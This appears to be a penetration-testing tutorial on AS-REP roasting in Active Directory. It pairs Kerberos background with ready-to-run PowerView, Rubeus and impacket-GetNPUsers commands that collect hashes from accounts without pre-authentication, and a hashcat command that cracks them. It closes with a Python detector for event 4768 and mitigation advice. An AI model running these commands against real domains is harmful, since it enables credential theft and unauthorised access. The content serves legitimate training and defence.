OffSec Series – AS-REP Roasting
AS-REP Roasting is a technique used to target weak user account settings in Active Directory, particularly those with the “Do not require Kerberos preauthentication” setting enabled. Attackers abuse the lack of Kerberos pre-authentication to retrieve password hashes, which can then be cracked offline using tools like Hashcat to obtain plaintext passwords.
Contents
| Section | Description |
|---|---|
| Overview | What is AS-REP Roasting and how it works |
| Kerberos Pre-authentication | Understanding the authentication mechanism |
| Abusing Pre-Auth | How attackers exploit disabled pre-authentication |
| Execution | Tools and techniques for exploitation |
| References | Additional resources |
Overview
AS-REP Roasting targets user accounts in Active Directory that have the “Do not require Kerberos preauthentication” setting enabled. This setting lets a user account request and obtain a ticket from the KDC without first proving knowledge of its password. The response (AS-REP) contains data encrypted with a key derived from the user’s password, and an attacker can capture that data and crack it offline using tools like hashcat to recover the password.

Kerberos Pre-authentication
Kerberos pre-authentication is an optional feature of the Kerberos protocol that can be used to provide stronger authentication between clients and servers. In Kerberos, authentication is performed by exchanging tickets between the client and the Key Distribution Center (KDC). The KDC is a trusted server that maintains a database of user and service accounts and their associated credentials.

When a client requests a TGT, it sends an Authentication Server Request (AS-REQ) to the DC that carries pre-authentication data: a timestamp encrypted with the hash of the user’s password. This is the information the DC uses to verify the client’s identity. If the DC can decrypt that timestamp using its own record of the user’s password hash, it sends back an Authentication Server Response (AS-REP) message containing a Ticket Granting Ticket (TGT) issued by the KDC, which the user presents in subsequent access requests.
Pre-authentication can help to improve the security of Kerberos by making it more difficult for attackers to impersonate users. By requiring clients to prove their identity before they are granted a ticket, pre-authentication can help to prevent man-in-the-middle attacks and other forms of attack.
Abusing Pre-Auth
An attacker would typically enumerate the domain to identify user accounts with the pre-authentication setting disabled. They can then request an AS-REP (Authentication Service Reply) message for each of those accounts from the domain controller, which contains the user’s encrypted credentials. By analyzing the AS-REP offline, the attacker can attempt to crack the user’s password using password cracking techniques such as dictionary attacks or brute force.
If successful, the attacker can obtain the user’s plaintext password, allowing them to gain unauthorized access to the user’s account and potentially escalate their privileges within the network.
Execution
Identifying Accounts Vulnerable to AS-REP Roasting
Using PowerView:
Get-DomainUser -PreauthNotRequired

Using AD Module/RSAT tools:
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth
Using Rubeus:
.\Rubeus.exe asreproast

Using impacket-GetNPUsers:
Users list dynamically queried with an RPC null session:
impacket-GetNPUsers -request -format hashcat -outputfile ASREProastables.txt -dc-ip $KeyDistributionCenter 'DOMAIN/'
With a users file:
impacket-GetNPUsers -usersfile users.txt -request -format hashcat -outputfile ASREProastables.txt -dc-ip $KeyDistributionCenter 'DOMAIN/'
Users list dynamically queried with an LDAP authenticated bind (password):
impacket-GetNPUsers -request -format hashcat -outputfile ASREProastables.txt -dc-ip $KeyDistributionCenter 'DOMAIN/USER:Password'
Users list dynamically queried with an LDAP authenticated bind (NT hash):
impacket-GetNPUsers -request -format hashcat -outputfile ASREProastables.txt -hashes 'LMhash:NThash' -dc-ip $KeyDistributionCenter 'DOMAIN/USER'

Cracking Obtained Hash Using Hashcat
Hashcat Mode: 18200 (Kerberos 5, etype 23, AS-REP)
sudo hashcat -m 18200 ASREProastables.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Key Takeaways
| Concept | Key Point |
|---|---|
| Target | User accounts with “Do not require Kerberos preauthentication” enabled |
| Attack Vector | Request AS-REP without password, extract encrypted credentials |
| Hash Type | Kerberos 5 etype 23 AS-REP (Hashcat mode 18200) |
| Enumeration Tools | PowerView, AD Module, impacket-GetNPUsers, Rubeus |
| Mitigation | Enable pre-authentication for all accounts, use strong passwords |
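On the defender side, the exchange described above leaves a trace: Windows Security event 4768 logs every TGT request with its Pre-Authentication Type, and type 0 means the KDC issued the AS-REP without pre-authentication, which is exactly what a roast obtains. The following Python is an added example (not from the original post) that runs that logic over constructed key=value log lines; the line layout and every hostname, account and IP in it are made up.

```python
"""Flag AS-REP roasting activity in Windows Security event 4768 records.

Event 4768 (TGT requested) carries PreAuthType; 0 means the AS-REP was issued
without pre-authentication, i.e. for an account with "Do not require Kerberos
preauthentication" set. TicketEncryptionType 0x17 is RC4-HMAC (etype 23), the
hash type hashcat mode 18200 cracks.
"""
import re
from collections import defaultdict

# Constructed sample log lines in a key=value layout (not real telemetry).
SAMPLE_LOG = """\
EventID=4768 TargetUserName=alice IpAddress=::ffff:10.0.0.5 PreAuthType=2 TicketEncryptionType=0x12
EventID=4768 TargetUserName=svc_backup IpAddress=::ffff:10.0.0.99 PreAuthType=0 TicketEncryptionType=0x17
EventID=4768 TargetUserName=legacy_app IpAddress=::ffff:10.0.0.99 PreAuthType=0 TicketEncryptionType=0x17
EventID=4768 TargetUserName=jdoe IpAddress=::ffff:10.0.0.99 PreAuthType=0 TicketEncryptionType=0x17
EventID=4768 TargetUserName=legacy_app IpAddress=::ffff:10.0.0.42 PreAuthType=0 TicketEncryptionType=0x17
EventID=4769 TargetUserName=bob IpAddress=::ffff:10.0.0.7 PreAuthType=- TicketEncryptionType=0x17
"""

KV_RE = re.compile(r"(\w+)=(\S+)")

def parse_line(line):
    """Turn one key=value line into a dict; strips the IPv4-mapped prefix."""
    ev = dict(KV_RE.findall(line))
    if "IpAddress" in ev:
        ev["IpAddress"] = ev["IpAddress"].replace("::ffff:", "")
    return ev

def is_no_preauth_tgt(ev):
    """True for a TGT issued with no pre-authentication (a roastable account)."""
    return ev.get("EventID") == "4768" and ev.get("PreAuthType") == "0"

def roasting_sources(log_text, min_accounts=3):
    """Map source IP -> sorted accounts it obtained no-preauth AS-REPs for,
    keeping only sources that touched at least min_accounts distinct accounts.
    One host sweeping many exempt accounts is the roasting pattern; a single
    exempt account from its usual host is normally just the exemption itself."""
    by_ip = defaultdict(set)
    for line in log_text.splitlines():
        ev = parse_line(line)
        if is_no_preauth_tgt(ev):
            by_ip[ev["IpAddress"]].add(ev["TargetUserName"])
    return {ip: sorted(users) for ip, users in by_ip.items() if len(users) >= min_accounts}

def rc4_etype_accounts(log_text):
    """Exempt accounts whose AS-REP used RC4 (etype 23): the hashcat 18200 case."""
    events = map(parse_line, log_text.splitlines())
    return sorted({ev["TargetUserName"] for ev in events
                   if is_no_preauth_tgt(ev) and ev.get("TicketEncryptionType") == "0x17"})

if __name__ == "__main__":
    for ip, users in roasting_sources(SAMPLE_LOG).items():
        print(f"possible AS-REP roasting from {ip}: {', '.join(users)}")
    print("exempt accounts still issued RC4 AS-REPs:", rc4_etype_accounts(SAMPLE_LOG))
```

The accounts listed by `rc4_etype_accounts` are the ones to fix under the Mitigation row: re-enable pre-authentication and rotate their passwords.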